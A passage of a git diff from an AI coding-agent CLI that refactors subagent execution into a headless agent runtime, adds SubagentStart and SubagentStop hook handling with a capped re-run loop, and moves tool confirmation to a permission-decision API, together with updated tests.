session. Used by /context to attribute + * loaded skill body tokens separately from the tool-definition cost. + */ + getLoadedSkillNames(): ReadonlySet { + return this.loadedSkillNames; + } + + /** + * Clears the loaded-skills tracking. Should be called when the session + * is reset (e.g. /clear) so that stale body-token data is not shown. 
+ */ + clearLoadedSkills(): void { + this.loadedSkillNames.clear(); + } } class SkillToolInvocation extends BaseToolInvocation { @@ -189,6 +221,7 @@ class SkillToolInvocation extends BaseToolInvocation { private readonly config: Config, private readonly skillManager: SkillManager, params: SkillParams, + private readonly onSkillLoaded: (name: string) => void, ) { super(params); } @@ -197,11 +230,6 @@ class SkillToolInvocation extends BaseToolInvocation { return `Use skill: "${this.params.skill}"`; } - override async shouldConfirmExecute(): Promise { - // Skill loading is a read-only operation, no confirmation needed - return false; - } - async execute( _signal?: AbortSignal, _updateOutput?: (output: ToolResultDisplay) => void, @@ -245,11 +273,10 @@ class SkillToolInvocation extends BaseToolInvocation { this.config, new SkillLaunchEvent(this.params.skill, true), ); + this.onSkillLoaded(this.params.skill); const baseDir = path.dirname(skill.filePath); - - // Build markdown content for LLM (show base dir, then body) - const llmContent = `Base directory for this skill: ${baseDir}\nImportant: ALWAYS resolve absolute paths from this base directory when working with skills.\n\n${skill.body}\n`; + const llmContent = buildSkillLlmContent(baseDir, skill.body); return { llmContent: [{ text: llmContent }], diff --git a/packages/core/src/tools/task.test.ts b/packages/core/src/tools/task.test.ts index 458b026b6..362dab13f 100644 --- a/packages/core/src/tools/task.test.ts +++ b/packages/core/src/tools/task.test.ts @@ -10,12 +10,15 @@ import type { PartListUnion } from '@google/genai'; import type { ToolResultDisplay, TaskResultDisplay } from './tools.js'; import type { Config } from '../config/config.js'; import { SubagentManager } from '../subagents/subagent-manager.js'; +import type { SubagentConfig } from '../subagents/types.js'; +import { AgentTerminateMode } from '../agents/runtime/agent-types.js'; import { - type SubagentConfig, - SubagentTerminateMode, -} from 
'../subagents/types.js'; -import { type SubAgentScope, ContextState } from '../subagents/subagent.js'; + type AgentHeadless, + ContextState, +} from '../agents/runtime/agent-headless.js'; import { partToString } from '../utils/partUtils.js'; +import type { HookSystem } from '../hooks/hookSystem.js'; +import { PermissionMode } from '../hooks/types.js'; // Type for accessing protected methods in tests type TaskToolWithProtectedMethods = TaskTool & { @@ -28,13 +31,12 @@ type TaskToolWithProtectedMethods = TaskTool & { returnDisplay: ToolResultDisplay; }>; getDescription: () => string; - shouldConfirmExecute: () => Promise; }; }; // Mock dependencies vi.mock('../subagents/subagent-manager.js'); -vi.mock('../subagents/subagent.js'); +vi.mock('../agents/runtime/agent-headless.js'); const MockedSubagentManager = vi.mocked(SubagentManager); const MockedContextState = vi.mocked(ContextState); @@ -72,6 +74,8 @@ describe('TaskTool', () => { getSessionId: vi.fn().mockReturnValue('test-session-id'), getSubagentManager: vi.fn(), getGeminiClient: vi.fn().mockReturnValue(undefined), + getHookSystem: vi.fn().mockReturnValue(undefined), + getTranscriptPath: vi.fn().mockReturnValue('/test/transcript'), } as unknown as Config; changeListeners = []; @@ -80,7 +84,7 @@ describe('TaskTool', () => { mockSubagentManager = { listSubagents: vi.fn().mockResolvedValue(mockSubagents), loadSubagent: vi.fn(), - createSubagentScope: vi.fn(), + createAgentHeadless: vi.fn(), addChangeListener: vi.fn((listener: () => void) => { changeListeners.push(listener); return () => { @@ -293,14 +297,14 @@ describe('TaskTool', () => { }); describe('TaskToolInvocation', () => { - let mockSubagentScope: SubAgentScope; + let mockAgent: AgentHeadless; let mockContextState: ContextState; beforeEach(() => { - mockSubagentScope = { - runNonInteractive: vi.fn().mockResolvedValue(undefined), + mockAgent = { + execute: vi.fn().mockResolvedValue(undefined), result: 'Task completed successfully', - terminateMode: 
SubagentTerminateMode.GOAL, + terminateMode: AgentTerminateMode.GOAL, getFinalText: vi.fn().mockReturnValue('Task completed successfully'), formatCompactResult: vi .fn() @@ -317,7 +321,6 @@ describe('TaskTool', () => { inputTokens: 1000, outputTokens: 500, totalTokens: 1500, - estimatedCost: 0.045, toolUsage: [ { name: 'grep', @@ -344,8 +347,8 @@ describe('TaskTool', () => { successfulToolCalls: 3, failedToolCalls: 0, }), - getTerminateMode: vi.fn().mockReturnValue(SubagentTerminateMode.GOAL), - } as unknown as SubAgentScope; + getTerminateMode: vi.fn().mockReturnValue(AgentTerminateMode.GOAL), + } as unknown as AgentHeadless; mockContextState = { set: vi.fn(), @@ -356,8 +359,8 @@ describe('TaskTool', () => { vi.mocked(mockSubagentManager.loadSubagent).mockResolvedValue( mockSubagents[0], ); - vi.mocked(mockSubagentManager.createSubagentScope).mockResolvedValue( - mockSubagentScope, + vi.mocked(mockSubagentManager.createAgentHeadless).mockResolvedValue( + mockAgent, ); }); @@ -376,12 +379,12 @@ describe('TaskTool', () => { expect(mockSubagentManager.loadSubagent).toHaveBeenCalledWith( 'file-search', ); - expect(mockSubagentManager.createSubagentScope).toHaveBeenCalledWith( + expect(mockSubagentManager.createAgentHeadless).toHaveBeenCalledWith( mockSubagents[0], config, expect.any(Object), // eventEmitter parameter ); - expect(mockSubagentScope.runNonInteractive).toHaveBeenCalledWith( + expect(mockAgent.execute).toHaveBeenCalledWith( mockContextState, undefined, // signal parameter (undefined when not provided) ); @@ -416,7 +419,7 @@ describe('TaskTool', () => { }); it('should handle execution errors gracefully', async () => { - vi.mocked(mockSubagentManager.createSubagentScope).mockRejectedValue( + vi.mocked(mockSubagentManager.createAgentHeadless).mockRejectedValue( new Error('Creation failed'), ); @@ -515,9 +518,9 @@ describe('TaskTool', () => { const invocation = ( taskTool as TaskToolWithProtectedMethods ).createInvocation(params); - const shouldConfirm = await 
invocation.shouldConfirmExecute(); + const permission = await invocation.getDefaultPermission(); - expect(shouldConfirm).toBe(false); + expect(permission).toBe('allow'); }); it('should provide correct description', async () => { @@ -535,4 +538,464 @@ describe('TaskTool', () => { expect(description).toBe('file-search subagent: "Search files"'); }); }); + + describe('SubagentStart hook integration', () => { + let mockAgent: AgentHeadless; + let mockContextState: ContextState; + let mockHookSystem: HookSystem; + + beforeEach(() => { + mockAgent = { + execute: vi.fn().mockResolvedValue(undefined), + result: 'Task completed successfully', + terminateMode: AgentTerminateMode.GOAL, + getFinalText: vi.fn().mockReturnValue('Task completed successfully'), + formatCompactResult: vi.fn().mockReturnValue('✅ Success'), + getExecutionSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + successfulToolCalls: 1, + failedToolCalls: 0, + successRate: 100, + inputTokens: 100, + outputTokens: 50, + totalTokens: 150, + estimatedCost: 0.01, + toolUsage: [], + }), + getStatistics: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + successfulToolCalls: 1, + failedToolCalls: 0, + }), + getTerminateMode: vi.fn().mockReturnValue(AgentTerminateMode.GOAL), + } as unknown as AgentHeadless; + + mockContextState = { + set: vi.fn(), + } as unknown as ContextState; + + MockedContextState.mockImplementation(() => mockContextState); + + vi.mocked(mockSubagentManager.loadSubagent).mockResolvedValue( + mockSubagents[0], + ); + vi.mocked(mockSubagentManager.createAgentHeadless).mockResolvedValue( + mockAgent, + ); + + mockHookSystem = { + fireSubagentStartEvent: vi.fn().mockResolvedValue(undefined), + fireSubagentStopEvent: vi.fn().mockResolvedValue(undefined), + } as unknown as HookSystem; + + vi.mocked(config.getGeminiClient).mockReturnValue(undefined as never); + (config as unknown as Record)['getHookSystem'] = vi + .fn() + 
.mockReturnValue(mockHookSystem); + (config as unknown as Record)['getTranscriptPath'] = vi + .fn() + .mockReturnValue('/test/transcript'); + }); + + it('should call fireSubagentStartEvent before execution', async () => { + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockHookSystem.fireSubagentStartEvent).toHaveBeenCalledWith( + expect.stringContaining('file-search-'), + 'file-search', + PermissionMode.Default, + ); + }); + + it('should inject additionalContext from SubagentStart hook into context', async () => { + const mockStartOutput = { + getAdditionalContext: vi + .fn() + .mockReturnValue('Extra context from hook'), + }; + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockResolvedValue( + mockStartOutput as never, + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockContextState.set).toHaveBeenCalledWith( + 'hook_context', + 'Extra context from hook', + ); + }); + + it('should not inject hook_context when additionalContext is undefined', async () => { + const mockStartOutput = { + getAdditionalContext: vi.fn().mockReturnValue(undefined), + }; + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockResolvedValue( + mockStartOutput as never, + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockContextState.set).not.toHaveBeenCalledWith( + 'hook_context', + 
expect.anything(), + ); + }); + + it('should continue execution when SubagentStart hook fails', async () => { + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockRejectedValue( + new Error('Hook failed'), + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + const result = await invocation.execute(); + + // Should still complete successfully despite hook failure + const llmText = partToString(result.llmContent); + expect(llmText).toBe('Task completed successfully'); + const display = result.returnDisplay as TaskResultDisplay; + expect(display.status).toBe('completed'); + }); + + it('should skip hooks when hookSystem is not available', async () => { + (config as unknown as Record)['getHookSystem'] = vi + .fn() + .mockReturnValue(undefined); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + const result = await invocation.execute(); + + expect(mockHookSystem.fireSubagentStartEvent).not.toHaveBeenCalled(); + const llmText = partToString(result.llmContent); + expect(llmText).toBe('Task completed successfully'); + }); + }); + + describe('SubagentStop hook integration', () => { + let mockAgent: AgentHeadless; + let mockContextState: ContextState; + let mockHookSystem: HookSystem; + + beforeEach(() => { + mockAgent = { + execute: vi.fn().mockResolvedValue(undefined), + result: 'Task completed successfully', + terminateMode: AgentTerminateMode.GOAL, + getFinalText: vi.fn().mockReturnValue('Task completed successfully'), + formatCompactResult: vi.fn().mockReturnValue('✅ Success'), + getExecutionSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + 
successfulToolCalls: 1, + failedToolCalls: 0, + successRate: 100, + inputTokens: 100, + outputTokens: 50, + totalTokens: 150, + estimatedCost: 0.01, + toolUsage: [], + }), + getStatistics: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + successfulToolCalls: 1, + failedToolCalls: 0, + }), + getTerminateMode: vi.fn().mockReturnValue(AgentTerminateMode.GOAL), + } as unknown as AgentHeadless; + + mockContextState = { + set: vi.fn(), + } as unknown as ContextState; + + MockedContextState.mockImplementation(() => mockContextState); + + vi.mocked(mockSubagentManager.loadSubagent).mockResolvedValue( + mockSubagents[0], + ); + vi.mocked(mockSubagentManager.createAgentHeadless).mockResolvedValue( + mockAgent, + ); + + mockHookSystem = { + fireSubagentStartEvent: vi.fn().mockResolvedValue(undefined), + fireSubagentStopEvent: vi.fn().mockResolvedValue(undefined), + } as unknown as HookSystem; + + vi.mocked(config.getGeminiClient).mockReturnValue(undefined as never); + (config as unknown as Record)['getHookSystem'] = vi + .fn() + .mockReturnValue(mockHookSystem); + (config as unknown as Record)['getTranscriptPath'] = vi + .fn() + .mockReturnValue('/test/transcript'); + }); + + it('should call fireSubagentStopEvent after execution', async () => { + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockHookSystem.fireSubagentStopEvent).toHaveBeenCalledWith( + expect.stringContaining('file-search-'), + 'file-search', + '/test/transcript', + 'Task completed successfully', + false, + PermissionMode.Default, + ); + }); + + it('should re-execute subagent when stop hook returns blocking decision', async () => { + const mockBlockOutput = { + isBlockingDecision: vi + .fn() + .mockReturnValueOnce(true) + 
.mockReturnValueOnce(false), + shouldStopExecution: vi.fn().mockReturnValue(false), + getEffectiveReason: vi + .fn() + .mockReturnValue('Continue working on the task'), + }; + + // First call returns block, second call returns allow (no output) + vi.mocked(mockHookSystem.fireSubagentStopEvent) + .mockResolvedValueOnce(mockBlockOutput as never) + .mockResolvedValueOnce(undefined as never); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + // Should have called execute twice (initial + re-execution) + expect(mockAgent.execute).toHaveBeenCalledTimes(2); + // Stop hook should have been called twice + expect(mockHookSystem.fireSubagentStopEvent).toHaveBeenCalledTimes(2); + // Second call should have stopHookActive=true + expect(mockHookSystem.fireSubagentStopEvent).toHaveBeenNthCalledWith( + 2, + expect.stringContaining('file-search-'), + 'file-search', + '/test/transcript', + 'Task completed successfully', + true, + PermissionMode.Default, + ); + }); + + it('should re-execute subagent when stop hook returns shouldStopExecution', async () => { + const mockStopOutput = { + isBlockingDecision: vi.fn().mockReturnValue(false), + shouldStopExecution: vi.fn().mockReturnValueOnce(true), + getEffectiveReason: vi.fn().mockReturnValue('Output is incomplete'), + }; + + vi.mocked(mockHookSystem.fireSubagentStopEvent) + .mockResolvedValueOnce(mockStopOutput as never) + .mockResolvedValueOnce(undefined as never); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockAgent.execute).toHaveBeenCalledTimes(2); + }); + + it('should allow stop 
when SubagentStop hook fails', async () => { + vi.mocked(mockHookSystem.fireSubagentStopEvent).mockRejectedValue( + new Error('Stop hook failed'), + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + const result = await invocation.execute(); + + // Should still complete successfully despite hook failure + const llmText = partToString(result.llmContent); + expect(llmText).toBe('Task completed successfully'); + const display = result.returnDisplay as TaskResultDisplay; + expect(display.status).toBe('completed'); + }); + + it('should skip SubagentStop hook when signal is aborted', async () => { + const abortController = new AbortController(); + abortController.abort(); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(abortController.signal); + + expect(mockHookSystem.fireSubagentStopEvent).not.toHaveBeenCalled(); + }); + + it('should stop re-execution loop when signal is aborted during block handling', async () => { + const abortController = new AbortController(); + + const mockBlockOutput = { + isBlockingDecision: vi.fn().mockReturnValue(true), + shouldStopExecution: vi.fn().mockReturnValue(false), + getEffectiveReason: vi.fn().mockReturnValue('Keep working'), + }; + + vi.mocked(mockHookSystem.fireSubagentStopEvent).mockResolvedValue( + mockBlockOutput as never, + ); + + // Abort after first re-execution + vi.mocked(mockAgent.execute).mockImplementation(async () => { + const callCount = vi.mocked(mockAgent.execute).mock.calls.length; + if (callCount >= 2) { + abortController.abort(); + } + }); + + const params: TaskParams = { + description: 'Search files', + prompt: 
'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(abortController.signal); + + // Should have stopped the loop after abort + expect(mockAgent.execute).toHaveBeenCalledTimes(2); + }); + + it('should call both start and stop hooks in correct order', async () => { + const callOrder: string[] = []; + + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockImplementation( + async () => { + callOrder.push('start'); + return undefined; + }, + ); + vi.mocked(mockHookSystem.fireSubagentStopEvent).mockImplementation( + async () => { + callOrder.push('stop'); + return undefined; + }, + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(callOrder).toEqual(['start', 'stop']); + }); + + it('should pass consistent agentId to both start and stop hooks', async () => { + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + const startAgentId = vi.mocked(mockHookSystem.fireSubagentStartEvent).mock + .calls[0]?.[0] as string; + const stopAgentId = vi.mocked(mockHookSystem.fireSubagentStopEvent).mock + .calls[0]?.[0] as string; + + expect(startAgentId).toBe(stopAgentId); + expect(startAgentId).toMatch(/^file-search-\d+$/); + }); + }); }); diff --git a/packages/core/src/tools/task.ts b/packages/core/src/tools/task.ts index e811dde0d..974a4b41a 100644 --- a/packages/core/src/tools/task.ts +++ b/packages/core/src/tools/task.ts @@ -18,23 +18,23 @@ import type { } from './tools.js'; import type { Config } from 
'../config/config.js'; import type { SubagentManager } from '../subagents/subagent-manager.js'; +import type { SubagentConfig } from '../subagents/types.js'; +import { AgentTerminateMode } from '../agents/runtime/agent-types.js'; +import { ContextState } from '../agents/runtime/agent-headless.js'; import { - type SubagentConfig, - SubagentTerminateMode, -} from '../subagents/types.js'; -import { ContextState } from '../subagents/subagent.js'; -import { - SubAgentEventEmitter, - SubAgentEventType, -} from '../subagents/subagent-events.js'; + AgentEventEmitter, + AgentEventType, +} from '../agents/runtime/agent-events.js'; import type { - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentFinishEvent, - SubAgentErrorEvent, - SubAgentApprovalRequestEvent, -} from '../subagents/subagent-events.js'; + AgentToolCallEvent, + AgentToolResultEvent, + AgentFinishEvent, + AgentErrorEvent, + AgentApprovalRequestEvent, +} from '../agents/runtime/agent-events.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { PermissionMode } from '../hooks/types.js'; +import type { StopHookOutput } from '../hooks/types.js'; export interface TaskParams { description: string; @@ -54,6 +54,7 @@ export class TaskTool extends BaseDeclarativeTool { private subagentManager: SubagentManager; private availableSubagents: SubagentConfig[] = []; + private readonly removeChangeListener: () => void; constructor(private readonly config: Config) { // Initialize with a basic schema first @@ -89,7 +90,7 @@ export class TaskTool extends BaseDeclarativeTool { ); this.subagentManager = config.getSubagentManager(); - this.subagentManager.addChangeListener(() => { + this.removeChangeListener = this.subagentManager.addChangeListener(() => { void this.refreshSubagents(); }); @@ -97,6 +98,10 @@ export class TaskTool extends BaseDeclarativeTool { this.refreshSubagents(); } + dispose(): void { + this.removeChangeListener(); + } + /** * Asynchronously initializes the tool by loading 
available subagents * and updating the description and schema. @@ -262,7 +267,7 @@ assistant: "I'm going to use the Task tool to launch the with the greeting-respo } class TaskToolInvocation extends BaseToolInvocation { - private readonly _eventEmitter: SubAgentEventEmitter; + readonly eventEmitter: AgentEventEmitter = new AgentEventEmitter(); private currentDisplay: TaskResultDisplay | null = null; private currentToolCalls: TaskResultDisplay['toolCalls'] = []; @@ -272,11 +277,6 @@ class TaskToolInvocation extends BaseToolInvocation { params: TaskParams, ) { super(params); - this._eventEmitter = new SubAgentEventEmitter(); - } - - get eventEmitter(): SubAgentEventEmitter { - return this._eventEmitter; } /** @@ -304,12 +304,12 @@ class TaskToolInvocation extends BaseToolInvocation { private setupEventListeners( updateOutput?: (output: ToolResultDisplay) => void, ): void { - this.eventEmitter.on(SubAgentEventType.START, () => { + this.eventEmitter.on(AgentEventType.START, () => { this.updateDisplay({ status: 'running' }, updateOutput); }); - this.eventEmitter.on(SubAgentEventType.TOOL_CALL, (...args: unknown[]) => { - const event = args[0] as SubAgentToolCallEvent; + this.eventEmitter.on(AgentEventType.TOOL_CALL, (...args: unknown[]) => { + const event = args[0] as AgentToolCallEvent; const newToolCall = { callId: event.callId, name: event.name, @@ -327,33 +327,30 @@ class TaskToolInvocation extends BaseToolInvocation { ); }); - this.eventEmitter.on( - SubAgentEventType.TOOL_RESULT, - (...args: unknown[]) => { - const event = args[0] as SubAgentToolResultEvent; - const toolCallIndex = this.currentToolCalls!.findIndex( - (call) => call.callId === event.callId, + this.eventEmitter.on(AgentEventType.TOOL_RESULT, (...args: unknown[]) => { + const event = args[0] as AgentToolResultEvent; + const toolCallIndex = this.currentToolCalls!.findIndex( + (call) => call.callId === event.callId, + ); + if (toolCallIndex >= 0) { + this.currentToolCalls![toolCallIndex] = { + 
...this.currentToolCalls![toolCallIndex], + status: event.success ? 'success' : 'failed', + error: event.error, + responseParts: event.responseParts, + }; + + this.updateDisplay( + { + toolCalls: [...this.currentToolCalls!], + }, + updateOutput, ); - if (toolCallIndex >= 0) { - this.currentToolCalls![toolCallIndex] = { - ...this.currentToolCalls![toolCallIndex], - status: event.success ? 'success' : 'failed', - error: event.error, - responseParts: event.responseParts, - }; + } + }); - this.updateDisplay( - { - toolCalls: [...this.currentToolCalls!], - }, - updateOutput, - ); - } - }, - ); - - this.eventEmitter.on(SubAgentEventType.FINISH, (...args: unknown[]) => { - const event = args[0] as SubAgentFinishEvent; + this.eventEmitter.on(AgentEventType.FINISH, (...args: unknown[]) => { + const event = args[0] as AgentFinishEvent; this.updateDisplay( { status: event.terminateReason === 'GOAL' ? 'completed' : 'failed', @@ -363,8 +360,8 @@ class TaskToolInvocation extends BaseToolInvocation { ); }); - this.eventEmitter.on(SubAgentEventType.ERROR, (...args: unknown[]) => { - const event = args[0] as SubAgentErrorEvent; + this.eventEmitter.on(AgentEventType.ERROR, (...args: unknown[]) => { + const event = args[0] as AgentErrorEvent; this.updateDisplay( { status: 'failed', @@ -376,9 +373,9 @@ class TaskToolInvocation extends BaseToolInvocation { // Indicate when a tool call is waiting for approval this.eventEmitter.on( - SubAgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_WAITING_APPROVAL, (...args: unknown[]) => { - const event = args[0] as SubAgentApprovalRequestEvent; + const event = args[0] as AgentApprovalRequestEvent; const idx = this.currentToolCalls!.findIndex( (c) => c.callId === event.callId, ); @@ -413,6 +410,8 @@ class TaskToolInvocation extends BaseToolInvocation { ToolConfirmationOutcome.ProceedAlways, ToolConfirmationOutcome.ProceedAlwaysServer, ToolConfirmationOutcome.ProceedAlwaysTool, + ToolConfirmationOutcome.ProceedAlwaysProject, + 
ToolConfirmationOutcome.ProceedAlwaysUser, ]); if (proceedOutcomes.has(outcome)) { @@ -458,11 +457,6 @@ class TaskToolInvocation extends BaseToolInvocation { return `${this.params.subagent_type} subagent: "${this.params.description}"`; } - override async shouldConfirmExecute(): Promise { - // Task delegation should execute automatically without user confirmation - return false; - } - async execute( signal?: AbortSignal, updateOutput?: (output: ToolResultDisplay) => void, @@ -506,7 +500,7 @@ class TaskToolInvocation extends BaseToolInvocation { if (updateOutput) { updateOutput(this.currentDisplay); } - const subagentScope = await this.subagentManager.createSubagentScope( + const subagent = await this.subagentManager.createAgentHeadless( subagentConfig, this.config, { eventEmitter: this.eventEmitter }, @@ -516,14 +510,103 @@ class TaskToolInvocation extends BaseToolInvocation { const contextState = new ContextState(); contextState.set('task_prompt', this.params.prompt); + // Fire SubagentStart hook before execution + const hookSystem = this.config.getHookSystem(); + const agentId = `${subagentConfig.name}-${Date.now()}`; + const agentType = this.params.subagent_type; + + if (hookSystem) { + try { + const startHookOutput = await hookSystem.fireSubagentStartEvent( + agentId, + agentType, + PermissionMode.Default, + ); + + // Inject additional context from hook output into subagent context + const additionalContext = startHookOutput?.getAdditionalContext(); + if (additionalContext) { + contextState.set('hook_context', additionalContext); + } + } catch (hookError) { + debugLogger.warn( + `[TaskTool] SubagentStart hook failed, continuing execution: ${hookError}`, + ); + } + } + // Execute the subagent (blocking) - await subagentScope.runNonInteractive(contextState, signal); + await subagent.execute(contextState, signal); + + // Fire SubagentStop hook after execution and handle block decisions + if (hookSystem && !signal?.aborted) { + const transcriptPath = 
this.config.getTranscriptPath(); + let stopHookActive = false; + + // Loop to handle "block" decisions (prevent subagent from stopping) + let continueExecution = true; + let iterationCount = 0; + const maxIterations = 5; // Prevent infinite loops from hook misconfigurations + + while (continueExecution) { + iterationCount++; + + // Safety check to prevent infinite loops + if (iterationCount >= maxIterations) { + debugLogger.warn( + `[TaskTool] SubagentStop hook reached maximum iterations (${maxIterations}), forcing stop to prevent infinite loop`, + ); + continueExecution = false; + break; + } + + try { + const stopHookOutput = await hookSystem.fireSubagentStopEvent( + agentId, + agentType, + transcriptPath, + subagent.getFinalText(), + stopHookActive, + PermissionMode.Default, + ); + + const typedStopOutput = stopHookOutput as + | StopHookOutput + | undefined; + + if ( + typedStopOutput?.isBlockingDecision() || + typedStopOutput?.shouldStopExecution() + ) { + // Feed the reason back to the subagent and continue execution + const continueReason = typedStopOutput.getEffectiveReason(); + stopHookActive = true; + + const continueContext = new ContextState(); + continueContext.set('task_prompt', continueReason); + await subagent.execute(continueContext, signal); + + if (signal?.aborted) { + continueExecution = false; + } + // Loop continues to re-check SubagentStop hook + } else { + continueExecution = false; + } + } catch (hookError) { + debugLogger.warn( + `[TaskTool] SubagentStop hook failed, allowing stop: ${hookError}`, + ); + continueExecution = false; + } + } + } // Get the results - const finalText = subagentScope.getFinalText(); - const terminateMode = subagentScope.getTerminateMode(); - const success = terminateMode === SubagentTerminateMode.GOAL; - const executionSummary = subagentScope.getExecutionSummary(); + const finalText = subagent.getFinalText(); + const terminateMode = subagent.getTerminateMode(); + const success = terminateMode === 
AgentTerminateMode.GOAL; + const executionSummary = subagent.getExecutionSummary(); if (signal?.aborted) { this.updateDisplay( diff --git a/packages/core/src/tools/todoWrite.ts b/packages/core/src/tools/todoWrite.ts index f99fbccdd..2cdbafb51 100644 --- a/packages/core/src/tools/todoWrite.ts +++ b/packages/core/src/tools/todoWrite.ts @@ -313,13 +313,6 @@ class TodoWriteToolInvocation extends BaseToolInvocation< return this.operationType === 'create' ? 'Create todos' : 'Update todos'; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - // Todo operations should execute automatically without user confirmation - return false; - } - async execute(_signal: AbortSignal): Promise { const { todos, modified_by_user, modified_content } = this.params; const sessionId = this.config.getSessionId(); diff --git a/packages/core/src/tools/tool-registry.ts b/packages/core/src/tools/tool-registry.ts index 5fccddb4b..e2110810b 100644 --- a/packages/core/src/tools/tool-registry.ts +++ b/packages/core/src/tools/tool-registry.ts @@ -209,6 +209,22 @@ export class ToolRegistry { this.tools.set(tool.name, tool); } + /** + * Copies discovered (non-core) tools from another registry into this one. + * Used to share MCP/command-discovered tools with per-agent registries + * that were built with skipDiscovery. + */ + copyDiscoveredToolsFrom(source: ToolRegistry): void { + for (const tool of source.getAllTools()) { + if ( + (tool instanceof DiscoveredTool || tool instanceof DiscoveredMCPTool) && + !this.tools.has(tool.name) + ) { + this.tools.set(tool.name, tool); + } + } + } + private removeDiscoveredTools(): void { for (const tool of this.tools.values()) { if (tool instanceof DiscoveredTool || tool instanceof DiscoveredMCPTool) { @@ -527,10 +543,20 @@ export class ToolRegistry { } /** - * Stops all MCP clients and cleans up resources. + * Stops all MCP clients, disposes tools, and cleans up resources. 
* This method is idempotent and safe to call multiple times. */ async stop(): Promise { + for (const tool of this.tools.values()) { + if ('dispose' in tool && typeof tool.dispose === 'function') { + try { + tool.dispose(); + } catch (error) { + debugLogger.error(`Error disposing tool ${tool.name}:`, error); + } + } + } + try { await this.mcpClientManager.stop(); } catch (error) { diff --git a/packages/core/src/tools/tools.test.ts b/packages/core/src/tools/tools.test.ts index 38827268c..244642e83 100644 --- a/packages/core/src/tools/tools.test.ts +++ b/packages/core/src/tools/tools.test.ts @@ -6,6 +6,7 @@ import { describe, it, expect, vi } from 'vitest'; import type { ToolInvocation, ToolResult } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { DeclarativeTool, hasCycleInSchema, Kind } from './tools.js'; import { ToolErrorType } from './tool-error.js'; @@ -23,8 +24,12 @@ class TestToolInvocation implements ToolInvocation { return []; } - shouldConfirmExecute(): Promise { - return Promise.resolve(false); + getDefaultPermission(): Promise { + return Promise.resolve('allow'); + } + + getConfirmationDetails(): Promise { + throw new Error('Not implemented'); } execute(): Promise { diff --git a/packages/core/src/tools/tools.ts b/packages/core/src/tools/tools.ts index 649b0cb4f..9e6f9f9bc 100644 --- a/packages/core/src/tools/tools.ts +++ b/packages/core/src/tools/tools.ts @@ -9,8 +9,9 @@ import { ToolErrorType } from './tool-error.js'; import type { DiffUpdateResult } from '../ide/ide-client.js'; import type { ShellExecutionConfig } from '../services/shellExecutionService.js'; import { SchemaValidator } from '../utils/schemaValidator.js'; -import { type SubagentStatsSummary } from '../subagents/subagent-statistics.js'; +import { type AgentStatsSummary } from '../agents/runtime/agent-statistics.js'; import type { AnsiOutput } from '../utils/terminalSerializer.js'; +import type { PermissionDecision } from 
